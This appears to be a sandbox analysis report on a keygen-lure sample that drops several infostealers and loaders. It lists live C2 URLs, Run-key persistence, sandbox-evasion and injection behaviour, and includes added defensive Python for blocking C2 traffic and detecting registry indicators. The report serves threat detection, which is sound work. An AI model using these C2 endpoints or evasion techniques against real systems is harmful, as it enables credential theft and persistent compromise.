Analysis

  max time kernel    144s
  max time network   152s
  platform           windows10_x64
  resource           win10v20201028
  submitted          13-02-2021 10:45

Tasks

  Static task      static1
  Behavioral task  behavioral1   Sample: Palo_Alto_Business_Plan_Pro_serial_key_gen.exe   Resource: win7v20201028
  Behavioral task  behavioral2   Sample: Palo_Alto_Business_Plan_Pro_serial_key_gen.exe   Resource: win10v20201028

  Every resource path in the signatures below is under behavioral2/, i.e. this page shows the Windows 10 x64 run.

General

  Target   Palo_Alto_Business_Plan_Pro_serial_key_gen.exe
  Size     9.0MB
  MD5      efb9f6994cbacf25a09260a6dea2e097
  SHA1     28dce13f68b89a4402a557a336c280400129999b
  SHA256   9a2895ec90f431962ab8ad4ae4f6808049f7ca629d92c61fb200e788d096c7dd
  SHA512   c8b2f89f162896cc9ba50daed06fbb92e4e84f73aa6a85da185e342fb096f535594e791488ac8595cfdf474418b59f1ba9507ff536059cdee0b0ce0288da3b0e
Malware Config

Extracted: azorult
  C2:  http://kvaka.li/1210776429.php

Extracted: smokeloader
  Version:  2020
  C2:
    http://naritouzina.net/
    http://nukaraguasleep.net/
    http://notfortuaj.net/
    http://natuturalistic.net/
    http://zaniolofusa.net/
    http://4zavr.com/upload/
    http://zynds.com/upload/
    http://atvua.com/upload/
    http://detse.net/upload/
    http://dsdett.com/upload/
    http://dtabasee.com/upload/
    http://yeronogles.monster/upload/

Extracted: raccoon
  17694a35d42ac97e2cd3ebd196db01b372cce1b0
  url4cnc:  https://telete.in/o23felk0s
Signatures

The sample is a "serial key generator" lure (note the keygen-step-*.exe chain under Executes dropped EXE) that carries several unrelated commodity families: Azorult, RedLine, SmokeLoader and Raccoon all have configs or payloads extracted from this single run.

Azorult
  An information stealer first seen in 2016 that targets browsing history and saved passwords.

RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload  (2 IoCs)
  Both memory regions belong to pid 2128, which is 90E5.exe in the Executes dropped EXE list.
  resource                                                                      yara_rule
  behavioral2/memory/2128-163-0x00000000022F0000-0x000000000231E000-memory.dmp   family_redline
  behavioral2/memory/2128-173-0x0000000004A50000-0x0000000004A7C000-memory.dmp   family_redline

SmokeLoader
  Modular loader/backdoor trojan, in use since 2011.

Nirsoft  (6 IoCs)
  YARA match for NirSoft utilities, legitimate password-recovery tools that stealers commonly bundle to harvest credentials.
  resource                                      yara_rule
  behavioral2/files/0x000200000001ab78-58.dat   Nirsoft
  behavioral2/files/0x000200000001ab78-59.dat   Nirsoft
  behavioral2/files/0x000500000001ab7c-67.dat   Nirsoft
  behavioral2/files/0x000500000001ab7c-68.dat   Nirsoft
  behavioral2/files/0x000600000001ab7c-76.dat   Nirsoft
  behavioral2/files/0x000600000001ab7c-77.dat   Nirsoft

Creates new service(s)  (1 TTP)

Executes dropped EXE  (28 IoCs)
  pid   Process
  1864  keygen-pr.exe
  3688  keygen-step-1.exe
  3776  keygen-step-3.exe
  1340  keygen-step-4.exe
  3140  key.exe
  636   Setup.exe
  3528  6489A2274AE24900.exe
  3956  6489A2274AE24900.exe
  3440  md2_2efs.exe
  3996  1613216621223.exe
  3884  1613216625786.exe
  932   1613216631442.exe
  1216  ThunderFW.exe
  1128  MiniThunderPlatform.exe
  3392  23E04C4F32EF2158.exe
  2504  23E04C4F32EF2158.tmp
  2712  seed.sfx.exe
  2280  seed.exe
  4984  8132.exe
  5004  83A4.exe
  5088  8887.exe
  396   8132.exe
  2128  90E5.exe
  4828  955A.exe
  4816  updatewin1.exe
  5016  updatewin2.exe
  2664  9BE3.exe
  5036  updatewin.exe

Modifies Windows Firewall  (1 TTP)

YARA match: office_xlm_macros  (1 IoC)
  A dropped file matches the Excel 4.0 (XLM) macro rule.
  resource                                      yara_rule
  behavioral2/files/0x0006000000015612-30.dat   office_xlm_macros

YARA match: upx  (2 IoCs)
  Dropped files are UPX-packed.
  resource                                       yara_rule
  behavioral2/files/0x000300000001abc6-120.dat   upx
  behavioral2/files/0x000300000001abc6-121.dat   upx
Checks computer location settings  (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, most likely for geofencing.
  description        ioc                                                                                                     Process
  Key value queried  \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation   cmd.exe

Loads dropped DLL  (11 IoCs)
  pid   Process                  events
  3828  MsiExec.exe              1
  3528  6489A2274AE24900.exe     2
  1128  MiniThunderPlatform.exe  7
  2280  seed.exe                 1

Modifies file permissions  (1 TTP, 1 IoC)
  pid   Process
  2196  icacls.exe

Reads user/profile data of web browsers  (2 TTPs)
  Infostealers routinely target stored browser data, which can include saved credentials, cookies and autofill entries.

Adds Run key to start application  (2 TTPs, 1 IoC)
  Persistence via a per-user Run key whose target lives in a GUID-named folder under AppData\Local and is started with an --AutoStart switch.
  description      ioc                                                                                                                                                                                                                                   Process
  Set value (str)  \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\b1facd0d-4dd5-495c-8d07-6e6f4f4b88c6\\8132.exe\" --AutoStart"   8132.exe

Checks installed software on the system  (1 TTP)
  Looks up Uninstall key entries in the registry to enumerate installed software.

Checks whether UAC is enabled  (4 IoCs)
  Reads the EnableLUA policy value to learn whether User Account Control is active.
  description        ioc                                                                                          Process
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA   Setup.exe
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA   6489A2274AE24900.exe
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA   6489A2274AE24900.exe
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA   md2_2efs.exe

Enumerates connected drives  (3 TTPs, 48 IoCs)
  Attempts to read the root path of drives other than the default C: drive.
  description              ioc                                                                                        Process
  File opened (read-only)  \??\A: through \??\Z:, every letter except C: and D: (24 letters, each opened twice)   msiexec.exe

Legitimate hosting services abused for malware hosting/C2  (1 TTP)

Looks up external IP address via web service  (3 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  100   api.2ip.ua
  101   api.2ip.ua
  118   api.2ip.ua
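The URLs in the Malware Config section and the api.2ip.ua flows above are the network indicators this report yields, and they are not all of one kind. The following Python is an added example, not part of the sandbox report, showing how to turn them into a proxy-log check that treats each kind differently: the Azorult and SmokeLoader hosts are dedicated attacker infrastructure and can be blocked by hostname; the Raccoon url4cnc entry sits on telete.in, a public Telegram web mirror (the assumption here is that this is what the report's "Legitimate hosting services abused" signature refers to), so only the exact path should be blocked, not the whole service; and api.2ip.ua is a legitimate IP-lookup service that should raise an alert rather than a block. The proxy-log format, the sample log lines and the api.2ip.ua path are constructed for the example.

```python
from urllib.parse import urlsplit

# Network indicators copied from the report's "Malware Config" section.
AZORULT_C2 = ["http://kvaka.li/1210776429.php"]
SMOKELOADER_C2 = [
    "http://naritouzina.net/", "http://nukaraguasleep.net/", "http://notfortuaj.net/",
    "http://natuturalistic.net/", "http://zaniolofusa.net/", "http://4zavr.com/upload/",
    "http://zynds.com/upload/", "http://atvua.com/upload/", "http://detse.net/upload/",
    "http://dsdett.com/upload/", "http://dtabasee.com/upload/",
    "http://yeronogles.monster/upload/",
]
RACCOON_URL4CNC = ["https://telete.in/o23felk0s"]   # dead drop on a shared Telegram mirror
IP_LOOKUP_HOSTS = {"api.2ip.ua"}                    # from "Looks up external IP address"


def _host_path(url):
    """Return (lower-cased hostname, path) for a URL, or (None, None) if unparseable."""
    parts = urlsplit(url)
    if not parts.hostname:
        return None, None
    return parts.hostname.lower(), parts.path or "/"


# Dedicated attacker infrastructure: block the whole host, whatever the path.
BLOCK_HOSTS = {_host_path(u)[0] for u in AZORULT_C2 + SMOKELOADER_C2}
# Shared legitimate service: block only the exact (host, path) pair.
BLOCK_URLS = {_host_path(u) for u in RACCOON_URL4CNC}


def classify(url):
    """Map a requested URL to (verdict, reason); verdict is 'block', 'alert' or 'allow'."""
    host, path = _host_path(url)
    if host is None:
        return "allow", "unparseable URL"
    if host in BLOCK_HOSTS:
        return "block", "dedicated C2 host"
    if (host, path) in BLOCK_URLS:
        return "block", "C2 dead-drop path on shared service"
    if host in IP_LOOKUP_HOSTS:
        return "alert", "external IP lookup service (weak indicator on its own)"
    return "allow", ""


def blocklist():
    """Hostnames safe to sinkhole outright; shared services are deliberately excluded."""
    return sorted(BLOCK_HOSTS)


# Constructed proxy log lines for the example, format: "<client> <method> <url>".
SAMPLE_PROXY_LOG = [
    "10.0.0.5 GET http://kvaka.li/1210776429.php",
    "10.0.0.5 POST http://4zavr.com/upload/",
    "10.0.0.5 GET https://telete.in/o23felk0s",
    "10.0.0.7 GET https://telete.in/s/some_channel",   # same mirror, unrelated path
    "10.0.0.5 GET http://api.2ip.ua/geo.json",          # constructed path
    "10.0.0.9 GET https://www.example.com/",
]


def scan(log_lines):
    """Return [(client, url, verdict, reason)] for every line that is not plainly allowed."""
    hits = []
    for line in log_lines:
        client, _method, url = line.split(" ", 2)
        verdict, reason = classify(url)
        if verdict != "allow":
            hits.append((client, url, verdict, reason))
    return hits


if __name__ == "__main__":
    for client, url, verdict, reason in scan(SAMPLE_PROXY_LOG):
        print("%-9s %-5s %-42s %s" % (client, verdict, url, reason))
```

Running the block prints four hits: three blocks (the Azorult gate, one SmokeLoader host, the Raccoon dead drop) and one alert for the IP lookup; the unrelated telete.in path and example.com pass. Sinkholing telete.in as a whole would break legitimate Telegram use on the network, which is exactly why a shared-service indicator is kept as a (host, path) pair.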
Writes to the Master Boot Record (MBR)  (1 TTP, 4 IoCs)
  Bootkits write to the MBR to gain persistence below the operating system. Note that this signature fires on a write-capable handle to the raw disk; the report does not show the bytes written, and hardware-fingerprinting code (disk serial lookups in installers and licensing stubs) opens the same device, so confirm an actual sector-0 write before treating this as a bootkit.
  description                   ioc                 Process
  File opened for modification  \??\PhysicalDrive0  Setup.exe
  File opened for modification  \??\PhysicalDrive0  6489A2274AE24900.exe
  File opened for modification  \??\PhysicalDrive0  6489A2274AE24900.exe
  File opened for modification  \??\PhysicalDrive0  MiniThunderPlatform.exe
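The registry and file rows in the signatures above (the SysHelper Run key, the Geo\Nation lookup, the EnableLUA reads, the PhysicalDrive0 handles) are the host-side indicators worth turning into detection logic. The following Python is an added example, not part of the sandbox report: a parser for rows in the shape this report prints them, plus four rules run over the parsed events. The rules generalise beyond this sample, as a practitioner would want: the Run-key rule fires on any autostart entry whose target sits in a GUID-named folder under AppData\Local or carries an --AutoStart switch, not only on 8132.exe. The ATT&CK technique IDs in the rule names are mine, not the report's, and the OneDrive row is a constructed benign control.

```python
import re

# Row shape as printed in the report's signature tables:
#   "<action> <path>[ = <value>] <process>"
ACTIONS = (
    "Set value (str)", "Set value (int)", "Set value (data)",
    "Key value queried", "Key opened", "Key created", "Key enumerated", "Key queried",
    "File opened for modification", "File opened (read-only)", "File created",
)

# The first four rows are copied from the report; the fifth is a constructed benign
# autostart entry used as a control (no GUID folder, no --AutoStart switch).
SAMPLE_ROWS = [
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\b1facd0d-4dd5-495c-8d07-6e6f4f4b88c6\\8132.exe\" --AutoStart" 8132.exe',
    r'Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation cmd.exe',
    r'File opened for modification \??\PhysicalDrive0 Setup.exe',
    r'Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background" explorer.exe',
]


def parse_row(row):
    """Split one report row into action, path, value (None if absent) and acting process."""
    action = next((a for a in ACTIONS if row.startswith(a + " ")), None)
    if action is None:
        raise ValueError("unknown action in row: %r" % row)
    rest, _, process = row[len(action) + 1:].rpartition(" ")   # process is the last token
    path, sep, value = rest.partition(" = ")                     # value only if " = " present
    return {"action": action, "path": path, "value": value if sep else None, "process": process}


# <anything>\AppData\Local\<GUID>\<name>.exe; the report prints backslashes doubled, so \\+.
GUID_DIR_EXE = re.compile(
    r'AppData\\+Local\\+[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\\+[^\\"]+\.exe',
    re.IGNORECASE,
)


def rule_run_key(ev):
    """Autostart entry in a GUID-named per-user folder or started with --AutoStart."""
    if not ev["action"].startswith("Set value") or ev["value"] is None:
        return None
    if "\\currentversion\\run\\" not in ev["path"].lower():
        return None
    if GUID_DIR_EXE.search(ev["value"]) or "--autostart" in ev["value"].lower():
        return "T1547.001 Run key pointing into a per-user GUID folder / --AutoStart entry"
    return None


def rule_geofence(ev):
    """Country-code lookup used to decide whether to run at all."""
    if ev["action"] == "Key value queried" and ev["path"].lower().endswith(
            "\\control panel\\international\\geo\\nation"):
        return "T1614 geofencing: Geo\\Nation country code read"
    return None


def rule_raw_disk(ev):
    """Write-capable handle to the raw boot disk; needs confirmation of the bytes written."""
    if ev["action"] == "File opened for modification" and ev["path"].lower() == "\\??\\physicaldrive0":
        return "T1542.003 candidate: write-capable handle to PhysicalDrive0 (confirm sector write)"
    return None


def rule_uac_check(ev):
    """Reads whether UAC is on, typically before choosing an elevation or bypass path."""
    if ev["path"].lower().endswith("\\policies\\system\\enablelua"):
        return "UAC status check: EnableLUA read"
    return None


RULES = (rule_run_key, rule_geofence, rule_raw_disk, rule_uac_check)


def triage(rows):
    """Parse every row and return the first matching rule per event, in input order."""
    findings = []
    for row in rows:
        ev = parse_row(row)
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append({"rule": hit, "process": ev["process"], "path": ev["path"]})
                break
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_ROWS):
        print("%-24s %s" % (f["process"], f["rule"]))
```

On the sample rows the four report entries each produce one finding and the OneDrive control produces none. The Run-key rule is the one to tune in production: OneDrive-style per-user autostarts are common, so the GUID-folder and --AutoStart conditions do the discriminating work, while the raw-disk rule is deliberately phrased as a candidate for the reason given in the signature description above.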
Enumerates physical storage devices  (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious use of NtSetInformationThreadHideFromDebugger  (1 IoC)
  NtSetInformationThread with ThreadHideFromDebugger (0x11) detaches the calling thread from any attached debugger, a common anti-analysis measure.
  pid  Process
  636  Setup.exe

Suspicious use of SetThreadContext  (3 IoCs)
  One process rewriting another process's thread context is the usual final step of process hollowing or injection: code has been mapped into the target and execution is redirected to it. Here 6489A2274AE24900.exe (pid 3528) does this to three children.
  description                            pid   Process               procid_target
  PID 3528 set thread context of 3972    3528  6489A2274AE24900.exe  102
  PID 3528 set thread context of 2164    3528  6489A2274AE24900.exe  111
  PID 3528 set thread context of 2504    3528  6489A2274AE24900.exe  113
Drops file in Program Files directory  (48 IoCs)
  Two installers are at work. seed.sfx.exe is a WinRAR self-extracting archive (the __tmp_rar_sfx_access_check_* file is its write-access probe) unpacking into Seed Trade\Seed. 23E04C4F32EF2158.tmp follows the Inno Setup pattern (is-XXXXX.tmp staging files later renamed to their final names, plus unins000.dat) under HappyNewYear.

  seed.sfx.exe:
    File opened for modification  C:\Program Files (x86)\Seed Trade
    File opened for modification  C:\Program Files (x86)\Seed Trade\Seed
    File created                  C:\Program Files (x86)\Seed Trade\Seed\__tmp_rar_sfx_access_check_259402000
    File created                  C:\Program Files (x86)\Seed Trade\Seed\seed.exe
    File opened for modification  C:\Program Files (x86)\Seed Trade\Seed\seed.exe

  23E04C4F32EF2158.tmp, all paths relative to C:\Program Files (x86)\HappyNewYear\:
    File opened for modification  seed.sfx.exe
    File opened for modification  DreamTrip.exe
    File created                  unins000.dat
    File opened for modification  unins000.dat
    File created  is-TEPD7.tmp, is-QF6G3.tmp, is-GLJNN.tmp, is-MQ76D.tmp, is-D4Q3A.tmp, is-N5TAG.tmp, is-JOJOF.tmp, is-954H1.tmp, is-81PI1.tmp, is-V97CT.tmp, is-9KCP2.tmp, is-0GM8A.tmp, is-TD80O.tmp, is-D67BV.tmp, is-V5J69.tmp, is-RQR66.tmp, is-EF55D.tmp, is-9C3DT.tmp, is-NMO6S.tmp, is-G4VTD.tmp, is-930S5.tmp
    File created  images\is-GM58I.tmp, images\is-V44H4.tmp, images\is-6IN36.tmp, images\is-PQFEM.tmp, images\is-R2R5L.tmp, images\is-B1B2H.tmp, images\is-H3KK9.tmp, images\is-9FCV1.tmp, images\is-OAPHL.tmp, images\is-EACC1.tmp, images\is-TSCK9.tmp, images\is-FGQ42.tmp, images\is-2B979.tmp, images\is-PD4MI.tmp, images\is-1G59G.tmp, images\is-C5P72.tmp
    File created  lang\is-NQK1S.tmp, lang\is-TOOE2.tmp
Drops file in Windows directory  (2 IoCs)
  Both entries are OS components writing their own housekeeping files (WerFault after the md2_2efs.exe crash recorded below, Edge during the analysis browser session), not drops controlled by the sample.
  description                   ioc                                             Process
  File created                  C:\Windows\AppCompat\Programs\Amcache.hve.tmp   WerFault.exe
  File opened for modification  C:\Windows\Debug\ESE.TXT                        MicrosoftEdge.exe

Launches sc.exe
  sc.exe is the Windows utility for controlling services on the system.

Program crash  (1 IoC)
  pid   pid_target  Process       procid_target
  1836  3440        WerFault.exe  97
  pid 3440 is md2_2efs.exe (see Executes dropped EXE).

Checks SCSI registry key(s)  (3 TTPs, 15 IoCs)
  SCSI device information is often read to detect sandbox or virtual-machine environments. The vendor/product strings visible here (Sanu DVD-ROM, HeartDisk) are the sandbox's own disk identities; the lookups are consistent with a check for virtualisation vendor strings such as VBOX, VMware or QEMU in the device description and friendly name.
  description        ioc                                                                                                                Process
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc      6489A2274AE24900.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc      6489A2274AE24900.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000                          6489A2274AE24900.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc               6489A2274AE24900.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000                          6489A2274AE24900.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI                                                                       seed.exe
  Key queried        \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI                                                                       seed.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000                  6489A2274AE24900.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName    6489A2274AE24900.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000                  6489A2274AE24900.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName    6489A2274AE24900.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc               6489A2274AE24900.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName             6489A2274AE24900.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName             6489A2274AE24900.exe
  Key enumerated     \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI                                                                       seed.exe

Delays execution with timeout.exe  (1 IoC)
  pid   Process
  5184  timeout.exe

Kills process with taskkill  (1 IoC)
  pid   Process
  2920  taskkill.exe

Modifies Control Panel  (1 IoC)
  description  ioc                                                                                 Process
  Key created  \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\Colors   MicrosoftEdge.exe
Modifies Internet Explorer settings  (3 IoCs)
  description  ioc                                                                                              Process
  Key created  \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main   MicrosoftEdge.exe
  Key created  \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main   browser_broker.exe
  Key created  \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main   MicrosoftEdgeCP.exe

Modifies registry class  (64 IoCs)
  63 of the 64 entries are Microsoft Edge (MicrosoftEdge.exe / MicrosoftEdgeCP.exe) initialising its own AppContainer state during the analysis session, i.e. browser noise rather than sample activity. The one entry not attributable to Edge is listed first. The "Protected - It is a violation of Windows Policy to modif" value name is Edge's own truncated protected-settings value, not a string from the sample.

  description  ioc                                                                              Process
  Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance   Process not Found

  All remaining keys are relative to
  \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\

  description       ioc                                                                             Process
  Key created       MicrosoftEdge\UserStateMigration\ChromeMigration                                MicrosoftEdge.exe
  Key created       Children\121\CIStatus                                                           MicrosoftEdgeCP.exe
  Key created       MicrosoftEdge\UserStateMigration\IEMigration                                    MicrosoftEdge.exe
  Set value (int)   MicrosoftEdge\GPU\DeviceId = "0"                                                MicrosoftEdge.exe
  Set value (int)   Children\006\CIStatus\CIPolicyState = "0"                                       MicrosoftEdgeCP.exe
  Key created       Children\006\ACGStatus                                                          MicrosoftEdgeCP.exe
  Set value (int)   Children\001\Internet Settings\Cache\Content\CacheLimit = "256000"              MicrosoftEdgeCP.exe
  Set value (int)   Internet Settings\Cache\Cookies\CacheLimit = "1"                                MicrosoftEdge.exe
  Set value (int)   MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"                                    MicrosoftEdge.exe
  Set value (data)  MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = [binary value omitted from the report]   MicrosoftEdge.exe
  Set value (int)   MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"                MicrosoftEdge.exe
  Set value (int)   MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"                           MicrosoftEdge.exe
  Set value (data)  CIStatus\CIStatusTimestamp = c84a4997fd01d701                                   MicrosoftEdge.exe
  Set value (data)  Children\006\CIStatus\SignaturePolicy = 06000000                                MicrosoftEdgeCP.exe
  Set value (int)   Children\001\CIStatus\CIPolicyState = "0"                                       MicrosoftEdgeCP.exe
  Key created       MicrosoftEdge\DummyPath                                                         MicrosoftEdge.exe
  Key created       MicrosoftEdge\BrowserEmulation\LowMic                                           MicrosoftEdge.exe
  Set value (int)   MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0"                           MicrosoftEdge.exe
  Key created       Children\121\Internet Settings\Cache                                            MicrosoftEdgeCP.exe
  Set value (int)   Children\001\Internet Settings\Cache\History\CacheLimit = "1"                   MicrosoftEdgeCP.exe
  Set value (int)   MicrosoftEdge\GPU\VersionHigh = "0"                                             MicrosoftEdge.exe
  Set value (int)   MicrosoftEdge\GPU\VersionLow = "0"                                              MicrosoftEdge.exe
  Set value (int)   MicrosoftEdge\GPU\Wow64-VersionHigh = "0"                                       MicrosoftEdge.exe
  Set value (int)   Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1"                   MicrosoftEdgeCP.exe
  Set value (str)   MicrosoftEdge\Main\ImageStoreRandomFolder = "y1y7scc"                           MicrosoftEdge.exe
  Key created       MicrosoftEdge\ServiceUI                                                         MicrosoftEdge.exe
  Set value (int)   MicrosoftEdge\Recovery\Active\{7A2FF968-FCB2-4C8E-A406-464F5CB748DD} = "0"     MicrosoftEdge.exe
  Set value (int)   MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"                              MicrosoftEdge.exe
  Set value (int)   MicrosoftEdge\GPU\Wow64-SubSysId = "0"                                          MicrosoftEdge.exe
  Key created       MicrosoftEdge\GPU                                                               MicrosoftEdgeCP.exe
  Key created       Children\001\Internet Settings\Cache\History                                    MicrosoftEdgeCP.exe
  Set value (int)   MicrosoftEdge\Main\SharedCookie_MRACMigrationDone = "1"                         MicrosoftEdge.exe
  Set value (str)   Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"                         MicrosoftEdge.exe
  Set value (int)   Internet Explorer\Main\OperationalData = "1"                                    MicrosoftEdge.exe
  Set value (int)   MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0"                        MicrosoftEdge.exe
  Set value (int)   MicrosoftEdge\GPU\SubSysId = "0"                                                MicrosoftEdge.exe
  Key created       MicrosoftEdge\Main                                                              MicrosoftEdge.exe
  Key created       Internet Settings                                                               MicrosoftEdge.exe
  Key created       MicrosoftEdge\Toolbar                                                           MicrosoftEdge.exe
  Set value (str)   Children\001\Internet Settings\Cache\Content\CachePrefix (value not shown in the report)   MicrosoftEdgeCP.exe
  Key created       MicrosoftEdge\Recovery                                                          MicrosoftEdge.exe
  Set value (int)   MicrosoftEdge\GPU\Wow64-DeviceId = "0"                                          MicrosoftEdge.exe
  Set value (int)   MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"                            MicrosoftEdge.exe
  Set value (int)   MicrosoftEdge\GPU\DXFeatureLevel = "0"                                          MicrosoftEdge.exe
  Key created       Children\001\ACGStatus                                                          MicrosoftEdgeCP.exe
  Key created       Internet Settings\Cache\History                                                 MicrosoftEdge.exe
  Set value (int)   MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"     MicrosoftEdge.exe
  Key created       MicrosoftEdge\OnlineHistory                                                     MicrosoftEdgeCP.exe
  Set value (int)   MicrosoftEdge\ReadingMode\SettingsVersion = "2"                                 MicrosoftEdge.exe
  Set value (data)  MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 010000000f1909e6974fe00319886b78c04a07bf87be2b933b2fc72014790a1480c76ff7365862211c3213c467009763efcf89b65a69bffe2f134cc0ce75   MicrosoftEdge.exe
  Set value (str)   Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"            MicrosoftEdgeCP.exe
  Key created       MicrosoftEdge\FavOrder                                                          MicrosoftEdge.exe
  Set value (int)   MicrosoftEdge\GPU\Revision = "0"                                                MicrosoftEdge.exe
  Set value (data)  CIStatus\CIStatusTimestamp = bf1efc97fd01d701                                   MicrosoftEdge.exe
  Key created       Children\001\Internet Settings                                                  MicrosoftEdgeCP.exe
  Set value (data)  CIStatus\CIStatusTimestamp = 42c2319cfd01d701                                   MicrosoftEdge.exe
  Key created       Children\121\Internet Settings\Cache\Extensible Cache                           MicrosoftEdgeCP.exe
  Set value (int)   MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1"    MicrosoftEdge.exe
  Key created       MicrosoftEdge\FavOrder\Favorites                                                MicrosoftEdge.exe
  Key created       MicrosoftEdge\GPU                                                               MicrosoftEdge.exe
  Key created       MicrosoftEdge\LowRegistry                                                       MicrosoftEdge.exe
  Key created       Internet Explorer                                                               MicrosoftEdge.exe
  Set value (data)  MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 998267c856add601   MicrosoftEdge.exe
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 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 Setup.exe -
Runs ping.exe 1 TTPs 4 IoCs
pid Process 3984 PING.EXE 640 PING.EXE 3656 PING.EXE 4468 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 4260 MicrosoftEdgeCP.exe 2280 seed.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 200 msiexec.exe 2504 23E04C4F32EF2158.tmp -
Suspicious use of SetWindowsHookEx 17 IoCs
